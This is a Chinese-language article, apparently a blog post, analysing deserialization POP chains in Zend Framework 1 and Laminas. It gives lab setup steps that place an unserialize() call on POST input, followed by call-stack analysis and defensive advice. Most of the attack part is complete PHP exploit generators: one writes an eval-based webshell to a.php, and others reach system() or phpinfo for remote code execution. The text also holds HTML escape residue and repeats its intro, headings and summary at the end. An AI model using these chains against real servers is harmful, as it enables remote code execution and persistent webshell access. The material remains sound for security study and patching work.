Zend Framework 反序列化漏洞分析与利用<\/h1>

前言<\/h2>
本文详细分析 Zend Framework 1 和 Laminas（Zend Framework 最新版）中的反序列化漏洞链（POP chains），包括漏洞原理、利用方法以及防御措施。<\/p>

1. Zend Framework 1 反序列化链分析<\/h2>

1.1 环境搭建<\/h3>

从 GitHub 下载 Zend Framework 1 源码：<\/p>

https:\/\/github.com\/zendframework\/zf1
<\/code><\/pre>
<\/li>

创建项目：<\/p>
zf create project web1
<\/span><\/span><\/code><\/pre><\/li>

将 library\/Zend 目录移动到 web1\/library 中<\/p>
<\/li>

修改控制器文件 application\/controllers\/IndexController.php：<\/p>
class<\/span> IndexController<\/span> extends<\/span> Zend_Controller_Action<\/span> {
<\/span><\/span>    public<\/span> function<\/span> indexAction<\/span>() {
<\/span><\/span>        unserialize<\/span>(base64_decode<\/span>($_POST['Mrkaixin'<\/span>]));
<\/span><\/span>        return<\/span> "Mrkaixin"<\/span>;
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
1.2 主要POP链分析<\/h3>
调用栈<\/strong>：<\/p>
Callback.php:150, Zend_Filter_Callback->filter()
Inflector.php:473, Zend_Filter_Inflector->filter()
Layout.php:780, Zend_Layout->render()
Mail.php:371, Zend_Log_Writer_Mail->shutdown()
Log.php:366, Zend_Log->__destruct()
IndexController.php:14, IndexController->indexAction()
<\/code><\/pre>
漏洞点分析<\/strong>：<\/p>

入口点在 Zend_Log::__destruct()<\/code>，它遍历 $this->_writers<\/code> 并调用其中对象的 shutdown()<\/code> 方法<\/li>
使用 Zend_Log_Writer_Mail<\/code> 的 shutdown()<\/code> 方法<\/li>
关键点在于两个 filter()<\/code> 函数的调用链，最终导致 create_function()<\/code> 的命令注入<\/li>
<\/ol>
1.3 其他利用链 - 写Shell<\/h3>
调用栈<\/strong>：<\/p>
File.php:464, Zend_CodeGenerator_Php_File->write()
Yaml.php:104, Zend_Config_Writer_Yaml->render()
Mail.php:371, Zend_Log_Writer_Mail->shutdown()
Log.php:366, Zend_Log->__destruct()
<\/code><\/pre>
利用原理<\/strong>：<\/p>

通过 Zend_Config_Writer_Yaml::render()<\/code> 中的 call_user_func($this->getYamlEncoder(), $data)<\/code><\/li>
利用可变函数特性，使 $this->getYamlEncoder()<\/code> 返回数组 [对象, 方法名]<\/code><\/li>
调用 Zend_CodeGenerator_Php_File::write()<\/code> 写入任意PHP代码<\/li>
<\/ol>
利用代码<\/strong>：<\/p>
class<\/span> Zend_Mail<\/span> {}
<\/span><\/span>class<\/span> Zend_Log<\/span> {
<\/span><\/span>    protected<\/span> $_writers;
<\/span><\/span>    function<\/span> __construct() {
<\/span><\/span>        $this-><\/span>_writers<\/span> =<\/span> [new<\/span> Zend_Log_Writer_Mail<\/span>()];
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>class<\/span> Zend_Log_Writer_Mail<\/span> {
<\/span><\/span>    protected<\/span> $_eventsToMail =<\/span> [1<\/span>];
<\/span><\/span>    protected<\/span> $_mail;
<\/span><\/span>    protected<\/span> $_layoutEventsToMail =<\/span> ""<\/span>;
<\/span><\/span>    protected<\/span> $_layout;
<\/span><\/span>    function<\/span> __construct() {
<\/span><\/span>        $this-><\/span>_mail<\/span> =<\/span> new<\/span> Zend_Mail<\/span>();
<\/span><\/span>        $this-><\/span>_layout<\/span> =<\/span> new<\/span> Zend_Config_Writer_Yaml<\/span>();
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>class<\/span> Zend_CodeGenerator_Php_File<\/span> {
<\/span><\/span>    protected<\/span> $_filename =<\/span> "a.php"<\/span>;
<\/span><\/span>    protected<\/span> $_body =<\/span> '@eval(base64_decode($_POST["Mrkaixin"]));'<\/span>;
<\/span><\/span>}
<\/span><\/span>class<\/span> Zend_Config<\/span> {
<\/span><\/span>    protected<\/span> $_data =<\/span> [];
<\/span><\/span>    protected<\/span> $_loadedSection =<\/span> "Mrkaixin"<\/span>;
<\/span><\/span>    protected<\/span> $_extends =<\/span> "Mrkaixin"<\/span>;
<\/span><\/span>}
<\/span><\/span>class<\/span> Zend_Config_Writer_Yaml<\/span> {
<\/span><\/span>    protected<\/span> $events =<\/span> "Mrkaixin"<\/span>;
<\/span><\/span>    protected<\/span> $_config;
<\/span><\/span>    protected<\/span> $_yamlEncoder;
<\/span><\/span>    function<\/span> __construct() {
<\/span><\/span>        $this-><\/span>_config<\/span> =<\/span> new<\/span> Zend_Config<\/span>();
<\/span><\/span>        $this-><\/span>_yamlEncoder<\/span> =<\/span> [new<\/span> Zend_CodeGenerator_Php_File<\/span>(), 'write'<\/span>];
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>echo<\/span> base64_encode<\/span>(serialize<\/span>(new<\/span> Zend_Log<\/span>()));
<\/span><\/span><\/code><\/pre>2. Laminas 反序列化链分析<\/h2>
2.1 环境搭建<\/h3>


创建项目：<\/p>
composer create-project -sdev laminas\/laminas-mvc-skeleton my-application
<\/span><\/span><\/code><\/pre><\/li>

安装日志组件：<\/p>
Would you like to install logging support? y
<\/code><\/pre>
<\/li>

设置反序列化点（module\/Application\/src\/Controller\/IndexController.php）：<\/p>
public<\/span> function<\/span> evilAction<\/span>() {
<\/span><\/span>    unserialize<\/span>(base64_decode<\/span>($this-><\/span>params<\/span>()-><\/span>fromPost<\/span>('data'<\/span>)));
<\/span><\/span>}
<\/span><\/span><\/code><\/pre><\/li>

访问URL：<\/p>
http:\/\/your-ip\/public\/index.php\/application\/evil
<\/code><\/pre>
<\/li>
<\/ol>
2.2 POP链分析<\/h3>
调用栈<\/strong>：<\/p>
AbstractInjector.php:379, Laminas\ComponentInstaller\Injector\ApplicationConfigInjector->remove()
PhpRenderer.php:396, call_user_func_array()
PhpRenderer.php:396, Laminas\View\Renderer\PhpRenderer->__call()
Mail.php:191, Laminas\View\Renderer\PhpRenderer->setBody()
Mail.php:191, Laminas\Log\Writer\Mail->shutdown()
Logger.php:220, Laminas\Log\Logger->__destruct()
<\/code><\/pre>
2.3 其他利用方式<\/h3>
2.3.1 RCE 利用1<\/h4>
namespace<\/span> Zend\View\Renderer<\/span>;
<\/span><\/span>use<\/span> Zend\Config\Config<\/span>;
<\/span><\/span>class<\/span> PhpRenderer<\/span> {
<\/span><\/span>    function<\/span> __construct() {
<\/span><\/span>        $this-><\/span>__helpers<\/span> =<\/span> new<\/span> Config<\/span>();
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>namespace<\/span> Zend\Config<\/span>;
<\/span><\/span>class<\/span> Config<\/span> {
<\/span><\/span>    protected<\/span> $data =<\/span> [];
<\/span><\/span>    function<\/span> __construct() {
<\/span><\/span>        $this-><\/span>data<\/span> =<\/span> ['shutdown'<\/span> =><\/span> "phpinfo"<\/span>];
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>namespace<\/span> Zend\Log<\/span>;
<\/span><\/span>use<\/span> Zend\View\Renderer\PhpRenderer<\/span>;
<\/span><\/span>class<\/span> Logger<\/span> {
<\/span><\/span>    protected<\/span> $writers;
<\/span><\/span>    function<\/span> __construct() {
<\/span><\/span>        $this-><\/span>writers<\/span> =<\/span> [new<\/span> PhpRenderer<\/span>()];
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>echo<\/span> base64_encode<\/span>(serialize<\/span>(new<\/span> Logger<\/span>()));
<\/span><\/span><\/code><\/pre>2.3.2 RCE 利用2<\/h4>
namespace<\/span> Laminas\View\Resolver<\/span> {
<\/span><\/span>    class<\/span> TemplateMapResolver<\/span> {
<\/span><\/span>        protected<\/span> $map =<\/span> ["setBody"<\/span> =><\/span> "system"<\/span>];
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>namespace<\/span> Laminas\View\Renderer<\/span> {
<\/span><\/span>    class<\/span> PhpRenderer<\/span> {
<\/span><\/span>        private<\/span> $__helpers;
<\/span><\/span>        function<\/span> __construct(){
<\/span><\/span>            $this-><\/span>__helpers<\/span> =<\/span> new<\/span> \Laminas\View\Resolver\TemplateMapResolver<\/span>();
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>namespace<\/span> Laminas\Log\Writer<\/span> {
<\/span><\/span>    abstract<\/span> class<\/span> AbstractWriter<\/span> {}
<\/span><\/span>    class<\/span> Mail<\/span> extends<\/span> AbstractWriter<\/span> {
<\/span><\/span>        protected<\/span> $eventsToMail =<\/span> ["ls"<\/span>];
<\/span><\/span>        protected<\/span> $subjectPrependText =<\/span> null<\/span>;
<\/span><\/span>        protected<\/span> $mail;
<\/span><\/span>        function<\/span> __construct(){
<\/span><\/span>            $this-><\/span>mail<\/span> =<\/span> new<\/span> \Laminas\View\Renderer\PhpRenderer<\/span>();
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>namespace<\/span> Laminas\Log<\/span> {
<\/span><\/span>    class<\/span> Logger<\/span> {
<\/span><\/span>        protected<\/span> $writers;
<\/span><\/span>        function<\/span> __construct(){
<\/span><\/span>            $this-><\/span>writers<\/span> =<\/span> [new<\/span> \Laminas\Log\Writer\Mail<\/span>()];
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>namespace<\/span> {
<\/span><\/span>    $a =<\/span> new<\/span> \Laminas\Log\Logger<\/span>();
<\/span><\/span>    echo<\/span> base64_encode<\/span>(serialize<\/span>($a));
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>3. 防御措施<\/h2>

避免反序列化用户可控的数据<\/li>
升级到最新版本：

Laminas-log 2.11 及以上版本修复了相关漏洞<\/li>
<\/ul>
<\/li>
使用 PHP 的 unserialize_callback_func<\/code> 配置或实现 __wakeup()<\/code> 方法进行安全检查<\/li>
考虑使用 JSON 等更安全的序列化格式替代 PHP 原生序列化<\/li>
<\/ol>
4. 总结<\/h2>
Zend Framework 及其后继者 Laminas 中存在多个反序列化漏洞链，攻击者可以利用这些链实现 RCE 或文件写入。开发者应当警惕反序列化操作，并采取适当的安全措施。<\/p>

Zend Framework 反序列化漏洞分析与利用<\/h1>

前言<\/h2> 本文详细分析 Zend Framework 1 和 Laminas（Zend Framework 最新版）中的反序列化漏洞链（POP chains），包括漏洞原理、利用方法以及防御措施。<\/p>

1. Zend Framework 1 反序列化链分析<\/h2>

2. Laminas 反序列化链分析<\/h2>

2.3 其他利用方式<\/h3>

4. 总结<\/h2> Zend Framework 及其后继者 Laminas 中存在多个反序列化漏洞链，攻击者可以利用这些链实现 RCE 或文件写入。开发者应当警惕反序列化操作，并采取适当的安全措施。<\/p>

前言<\/h2>
本文详细分析 Zend Framework 1 和 Laminas（Zend Framework 最新版）中的反序列化漏洞链（POP chains），包括漏洞原理、利用方法以及防御措施。<\/p>

4. 总结<\/h2>
Zend Framework 及其后继者 Laminas 中存在多个反序列化漏洞链，攻击者可以利用这些链实现 RCE 或文件写入。开发者应当警惕反序列化操作，并采取适当的安全措施。<\/p>